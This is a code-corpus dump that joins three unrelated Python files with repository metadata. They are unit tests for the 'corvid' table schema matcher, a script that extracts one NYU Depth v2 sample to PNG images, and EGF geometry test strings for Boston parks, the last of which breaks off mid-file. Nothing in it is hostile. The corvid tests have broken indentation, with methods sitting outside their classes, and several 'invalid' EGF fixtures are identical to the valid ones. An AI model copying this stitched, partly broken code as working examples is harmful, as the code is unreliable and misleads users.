afcarl/corvid
|
e257074edeac1e8dce4a737b60e93a9bea37b6b9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_table_aggregation/test_schema_matcher.py
|
afcarl/corvid
|
e257074edeac1e8dce4a737b60e93a9bea37b6b9
|
[
"Apache-2.0"
] | 1
|
2020-09-02T13:49:52.000Z
|
2020-09-02T13:49:52.000Z
|
import unittest
from corvid.types.table import Token, Cell, Table
from corvid.table_aggregation.pairwise_mapping import PairwiseMapping
from corvid.table_aggregation.schema_matcher import SchemaMatcher, \
ColNameSchemaMatcher
class SchemaMatcherTest(unittest.TestCase):
    """Unit tests for ``SchemaMatcher.aggregate_tables``."""

    def setUp(self):
        # 4x3 source table: a header row followed by data rows x, y, z.
        self.table_source = Table.create_from_cells([
            Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='6')], rowspan=1, colspan=1)
        ], nrow=4, ncol=3)

    def test_aggregate_tables(self):
        """Aggregating with swapped column mappings reorders data columns."""
        schema_matcher = SchemaMatcher()
        target_schema = Table.create_from_cells(cells=[
            Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='not_copied')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='not_copied')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='not_copied')], rowspan=1, colspan=1)
        ], nrow=2, ncol=3)
        pred_aggregate_table = schema_matcher.aggregate_tables(
            pairwise_mappings=[
                PairwiseMapping(self.table_source, target_schema,
                                score=-999, column_mappings=[(1, 2), (2, 1)])
            ],
            target_schema=target_schema)
        # Data columns 1 and 2 are swapped relative to the source table,
        # matching the (1, 2) / (2, 1) column mappings above.
        gold_aggregate_table = Table.create_from_cells([
            Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='5')], rowspan=1, colspan=1)
        ], nrow=4, ncol=3)
        # `assertEquals` is a deprecated alias (removed in Python 3.12); the
        # stray debug print() calls were dropped as well.
        self.assertEqual(pred_aggregate_table, gold_aggregate_table)

    def test_aggregate_tables_order(self):
        """Placeholder: correct ordering of 3+ tables (not yet implemented)."""
        # TODO: test correct ordering of 3+ tables
        pass
class ColumnNameSchemaMatcher(unittest.TestCase):
def setUp(self):
"""Build source-table fixtures with varying header layouts.

All tables share the same subject labels (x/y/z); the variants differ in
which header columns exist and in what order.
"""
# Baseline 4x3 table: header row (subject/header1/header2) + rows x, y, z.
self.table_source = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1)
], nrow=4, ncol=3)
# "header1" column dropped (2 columns); rows appear in order x, z, y.
self.table_less_header = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=4, ncol=2)
# Extra "header3" column, headers reordered, and each data value repeated
# across the three non-subject columns (4 columns total).
self.table_more_header = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=4, ncol=4)
# Headers permuted (header2 before header1); rows in order x, z, y.
# NOTE(review): the data cells keep the source's value order even though
# the headers are swapped - confirm this is intentional.
self.table_permute_header = Table.create_from_cells([
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=4, ncol=3)
# Data rows only (3x3); no header row at all.
self.table_no_header = Table.create_from_cells([
Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
], nrow=3, ncol=3)
# Header row only (1x3); no data rows.
self.table_only_header = Table.create_from_cells(cells=[
Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1)
], nrow=1, ncol=3)
def test_map_tables(self):
    """Exercise ColNameSchemaMatcher.map_tables against several target schemas.

    Covers an identical schema, a permuted one, a superset, a subset, and
    matching several source tables at once.
    """

    def one_row_schema(*labels):
        # Build a single-row header table from plain text labels.
        return Table.create_from_cells(
            cells=[Cell(tokens=[Token(text=label)], rowspan=1, colspan=1)
                   for label in labels],
            nrow=1, ncol=len(labels))

    schema_easy = one_row_schema('subject', 'header1', 'header2')
    schema_less = one_row_schema('subject', 'header2')
    schema_more = one_row_schema('subject', 'header0', 'header1', 'header2')
    schema_permuted = one_row_schema('subject', 'header2', 'header1')

    matcher = ColNameSchemaMatcher()
    # Each case: (input tables, target schema, expected pairwise mappings).
    cases = [
        ([self.table_source], schema_easy,
         [PairwiseMapping(self.table_source, schema_easy, score=2.0,
                          column_mappings=[(1, 1), (2, 2)])]),
        ([self.table_source], schema_permuted,
         [PairwiseMapping(self.table_source, schema_permuted, score=2.0,
                          column_mappings=[(1, 2), (2, 1)])]),
        ([self.table_source], schema_more,
         [PairwiseMapping(self.table_source, schema_more, score=2.0,
                          column_mappings=[(1, 2), (2, 3)])]),
        ([self.table_source], schema_less,
         [PairwiseMapping(self.table_source, schema_less, score=1.0,
                          column_mappings=[(2, 1)])]),
        ([self.table_source, self.table_less_header, self.table_more_header],
         schema_permuted,
         [PairwiseMapping(self.table_source, schema_permuted, score=2.0,
                          column_mappings=[(1, 2), (2, 1)]),
          PairwiseMapping(self.table_less_header, schema_permuted, score=1.0,
                          column_mappings=[(1, 1)]),
          PairwiseMapping(self.table_more_header, schema_permuted, score=2.0,
                          column_mappings=[(1, 1), (2, 2)])]),
    ]
    for tables, schema, expected in cases:
        self.assertListEqual(
            matcher.map_tables(tables=tables, target_schema=schema),
            expected)
class ColumnValueSchemaMatcher(unittest.TestCase):
    # NOTE(review): despite the name this is a TestCase, not a matcher;
    # a Test*-style name would make the intent obvious to test discovery.

    def setUp(self):
        """Build fixture tables with columns (subject, header1, header2).

        All three tables share the same header row; they differ only in
        which data rows are present and in what order.
        """
        # Data rows listed z, y, x — a row-permuted variant of the base data.
        self.table_permute_rows = Table.create_from_cells(cells=[
            Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='2')], rowspan=1, colspan=1)
        ], nrow=4, ncol=3)
        # Rows x, y, z plus an extra row w — a superset of the base data.
        self.table_extra_rows = Table.create_from_cells(cells=[
            Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='4')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='z')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='5')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='6')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='w')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='7')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='8')], rowspan=1, colspan=1)
        ], nrow=5, ncol=3)
        # Only rows x and y — the base data with the z row missing.
        self.table_missing_rows = Table.create_from_cells(cells=[
            Cell(tokens=[Token(text='subject')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='header2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='x')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='1')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='2')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='y')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='3')], rowspan=1, colspan=1),
            Cell(tokens=[Token(text='4')], rowspan=1, colspan=1)
        ], nrow=3, ncol=3)
| 50.173611
| 77
| 0.554879
| 1,750
| 14,450
| 4.490857
| 0.047429
| 0.175595
| 0.263392
| 0.33363
| 0.882046
| 0.869322
| 0.840819
| 0.836111
| 0.821606
| 0.809391
| 0
| 0.042149
| 0.271003
| 14,450
| 287
| 78
| 50.348432
| 0.703911
| 0.002353
| 0
| 0.707031
| 0
| 0
| 0.030179
| 0
| 0
| 0
| 0
| 0
| 0.023438
| 1
| 0.023438
| false
| 0.003906
| 0.015625
| 0
| 0.050781
| 0.007813
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b33225ce37303284a53f4130678fc85ff6b91c0c
| 4,410
|
py
|
Python
|
data/nyu-depth-v2/extract.py
|
fferflo/tf-semseg
|
b392cac2e8cca5389e7a099e8f7a87d72f4a70fc
|
[
"MIT"
] | null | null | null |
data/nyu-depth-v2/extract.py
|
fferflo/tf-semseg
|
b392cac2e8cca5389e7a099e8f7a87d72f4a70fc
|
[
"MIT"
] | null | null | null |
data/nyu-depth-v2/extract.py
|
fferflo/tf-semseg
|
b392cac2e8cca5389e7a099e8f7a87d72f4a70fc
|
[
"MIT"
] | null | null | null |
import h5py, imageio, argparse, os
import numpy as np
# CLI: the single required argument is the path to the NYUv2 labeled .mat file.
parser = argparse.ArgumentParser()
parser.add_argument("--nyu", type=str, required=True, help="Path to nyu_depth_v2_labeled.mat file")
args = parser.parse_args()
map_894_to_40 = np.array([0, 40, 40, 3, 22, 5, 40, 12, 38, 40, 40, 2, 39, 40, 40, 26, 40, 24, 40, 7, 40, 1, 40, 40, 34, 38, 29, 40, 8, 40, 40, 40, 40, 38, 40, 40, 14, 40, 38, 40, 40, 40, 15, 39, 40, 30, 40, 40, 39, 40, 39, 38, 40, 38, 40, 37, 40, 38, 38, 9, 40, 40, 38, 40, 11, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 13, 40, 40, 6, 40, 23, 40, 39, 10, 16, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 39, 40, 40, 40, 40, 39, 38, 40, 40, 40, 40, 40, 40, 18, 40, 40, 19, 28, 33, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 27, 36, 40, 40, 40, 40, 21, 40, 20, 35, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 4, 32, 40, 40, 39, 40, 39, 40, 40, 40, 40, 40, 17, 40, 40, 25, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 38, 38, 40, 40, 39, 40, 39, 40, 38, 39, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 38, 40, 40, 38, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 38, 40, 40, 39, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 31, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 38, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 39, 40, 40, 39, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 38, 39, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 39, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 38, 40, 39, 40, 40, 40, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 39, 40, 40, 39, 39, 40, 40, 40, 40, 38, 40, 40, 38, 39, 39, 40, 39, 40, 39, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 38, 40, 39, 40, 40, 40, 40, 40, 39, 39, 40, 40, 40, 40, 40, 40, 39, 39, 40, 
40, 38, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 39, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 39, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 38, 40, 40, 40, 40, 40, 40, 40, 39, 38, 39, 40, 38, 39, 40, 39, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 38, 40, 40, 39, 40, 40, 40, 39, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 38, 40, 40, 38, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 38, 38, 40, 40, 40, 38, 40, 40, 40, 38, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 38, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 39, 40, 40, 40, 40, 38, 38, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 39, 40, 40, 39, 39, 40, 40, 40, 40, 40, 40, 40, 40, 39, 39, 39, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 38, 40, 39, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 38, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40, 40, 40, 40, 40, 40, 40, 40, 39, 40, 40])
# Load data
# NOTE(review): only sample [0] of the dataset is read here — presumably this
# script is meant to extract a single example; confirm if all samples are needed.
# The transposes reorder the .mat axis layout into (H, W[, C]) — TODO confirm
# against the dataset's documented storage order.
file = h5py.File(args.nyu, mode="r")
color = np.transpose(np.asarray(file["images"][0]), (2, 1, 0))
depth = np.transpose(np.asarray(file["depths"][0]), (1, 0))
labels = np.transpose(np.asarray(file["labels"][0]), (1, 0))
# Process data
depth = (depth * 10000).astype("uint16")  # scale by 1e4 to fit 16-bit PNG (presumably metres -> 0.1 mm)
labels = map_894_to_40[labels].astype("uint8")  # remap raw label ids via the lookup table above
# Save data — PNGs are written next to this script.
path = os.path.dirname(os.path.abspath(__file__))
imageio.imwrite(os.path.join(path, "color.png"), color)
imageio.imwrite(os.path.join(path, "depth.png"), depth)
imageio.imwrite(os.path.join(path, "labels.png"), labels)
| 176.4
| 3,597
| 0.535147
| 1,026
| 4,410
| 2.285575
| 0.089669
| 0.977399
| 1.210235
| 1.371429
| 0.759062
| 0.721535
| 0.674627
| 0.668657
| 0.666098
| 0.628571
| 0
| 0.530618
| 0.226077
| 4,410
| 24
| 3,598
| 183.75
| 0.156461
| 0.007256
| 0
| 0
| 0
| 0
| 0.022989
| 0.005517
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2fe0955e36b279f30967dd3090b31e43c2bf286b
| 7,582
|
py
|
Python
|
tests/file_formats/variables/egf_vars.py
|
HFM3/strix
|
94bbc568f614bbb0f525d8ce17de4c64ef3b46d2
|
[
"MIT"
] | null | null | null |
tests/file_formats/variables/egf_vars.py
|
HFM3/strix
|
94bbc568f614bbb0f525d8ce17de4c64ef3b46d2
|
[
"MIT"
] | null | null | null |
tests/file_formats/variables/egf_vars.py
|
HFM3/strix
|
94bbc568f614bbb0f525d8ce17de4c64ef3b46d2
|
[
"MIT"
] | null | null | null |
"""
EGF string variables for testing.
"""
# POINT
valid_pt = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_geom = """PTs
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_last_line_1 = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_last_line_2 = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
a
"""
invalid_pt_coord_sets = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
42.355465, -71.066412, 10.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_headers = """PT
Park Name, City, Pond, Fountain
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
invalid_pt_sections = """PT
Park Name, City, Pond, Fountain
"""
invalid_pt_section_separators = """PT
Park Name, City, Pond, Fountain
Post office Square, Boston, FALSE, TRUE
42.356243, -71.055631, 2.0
Boston Common, Boston, TRUE, TRUE
42.355465, -71.066412, 10.0
"""
# LINESTRING
# Well-formed linestring block: each feature is an attribute row followed by
# its ordered vertex rows (lat, lng, elev).
valid_ls = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
42.35621, -71.063012, 0.0
42.356153, -71.06305, 0.0
42.356144, -71.063115, 0.0
42.356136, -71.063261, 0.0
42.355825, -71.064018, 0.0
"""
# Second feature has only a single vertex — too few for a linestring.
invalid_ls_coord_sets_1 = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
"""
# NOTE(review): identical to valid_ls as captured; the defect this variant is
# supposed to exercise appears lost to whitespace normalization — verify upstream.
invalid_ls_coord_sets_2 = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
42.35621, -71.063012, 0.0
42.356153, -71.06305, 0.0
42.356144, -71.063115, 0.0
42.356136, -71.063261, 0.0
42.355825, -71.064018, 0.0
"""
# NOTE(review): also identical to valid_ls as captured — same normalization
# concern as above; verify against the upstream source.
invalid_ls_sections = """LS
Park Name, Feature Description
Post Office Square, A walk by the fountain
42.356716, -71.055685, 0.0
42.356587, -71.055769, 0.0
42.356566, -71.055754, 0.0
42.356539, -71.055746, 0.0
42.356511, -71.055757, 0.0
42.356495, -71.05579, 0.0
42.356485, -71.05583, 0.0
42.356389, -71.055842, 0.0
42.356252, -71.055796, 0.0
42.356046, -71.055642, 0.0
42.355876, -71.055697, 0.0
42.355828, -71.055758, 0.0
Boston Common, A walk by the fountain
42.356251, -71.062737, 0.0
42.35621, -71.063012, 0.0
42.356153, -71.06305, 0.0
42.356144, -71.063115, 0.0
42.356136, -71.063261, 0.0
42.355825, -71.064018, 0.0
"""
# POLYGON
# Well-formed polygon block: each feature is an attribute row followed by the
# vertex rows of its outer boundary and any hole rings.
valid_poly = """POLY
Park Name, Feature Description
Post Office Square, Boundary of Post Office Square with holes for buildings
42.356856, -71.055757, 0.0
42.35608, -71.054976, 0.0
42.355697, -71.055636, 0.0
42.356003, -71.055941, 0.0
42.356767, -71.05622, 0.0
42.355955, -71.055522, 0.0
42.355894, -71.055458, 0.0
42.355846, -71.055546, 0.0
42.355908, -71.055615, 0.0
42.356089, -71.055312, 0.0
42.356005, -71.055226, 0.0
42.355969, -71.055288, 0.0
42.356058, -71.055373, 0.0
Boston Common, Boundary of Boston Common with a hole for the Frog Pond
42.356514, -71.062157, 0.0
42.355222, -71.063337, 0.0
42.352457, -71.064638, 0.0
42.352639, -71.067238, 0.0
42.356132, -71.06915, 0.0
42.357591, -71.06326, 0.0
42.356047, -71.065045, 0.0
42.355953, -71.065107, 0.0
42.355911, -71.065249, 0.0
42.356018, -71.065909, 0.0
42.35601, -71.066016, 0.0
42.355918, -71.066198, 0.0
42.355854, -71.066417, 0.0
42.355876, -71.066521, 0.0
42.355938, -71.066564, 0.0
42.355985, -71.066547, 0.0
42.356221, -71.066, 0.0
42.356296, -71.065647, 0.0
42.35627, -71.065341, 0.0
42.356186, -71.065127, 0.0
42.356123, -71.065061, 0.0
"""
# Rings are explicitly closed (first vertex repeated as last) and the second
# feature's outer boundary rows are missing — invalid variant 1.
invalid_poly_coord_sets_1 = """POLY
Park Name, Feature Description
Post Office Square, Boundary of Post Office Square with holes for buildings
42.356856, -71.055757, 0.0
42.35608, -71.054976, 0.0
42.355697, -71.055636, 0.0
42.356003, -71.055941, 0.0
42.356767, -71.05622, 0.0
42.356856, -71.055757, 0.0
42.355955, -71.055522, 0.0
42.355894, -71.055458, 0.0
42.355846, -71.055546, 0.0
42.355908, -71.055615, 0.0
42.355955, -71.055522, 0.0
42.356089, -71.055312, 0.0
42.356005, -71.055226, 0.0
42.355969, -71.055288, 0.0
42.356058, -71.055373, 0.0
42.356089, -71.055312, 0.0
Boston Common, Boundary of Boston Common with a hole for the Frog Pond
42.356514, -71.062157, 0.0
42.355222, -71.063337, 0.0
42.356047, -71.065045, 0.0
42.355953, -71.065107, 0.0
42.355911, -71.065249, 0.0
42.356018, -71.065909, 0.0
42.35601, -71.066016, 0.0
42.355918, -71.066198, 0.0
42.355854, -71.066417, 0.0
42.355876, -71.066521, 0.0
42.355938, -71.066564, 0.0
42.355985, -71.066547, 0.0
42.356221, -71.066, 0.0
42.356296, -71.065647, 0.0
42.35627, -71.065341, 0.0
42.356186, -71.065127, 0.0
42.356123, -71.065061, 0.0
42.356047, -71.065045, 0.0
"""
# Like variant 1 but the second feature's outer boundary is present and
# closed as well — all rings explicitly closed.
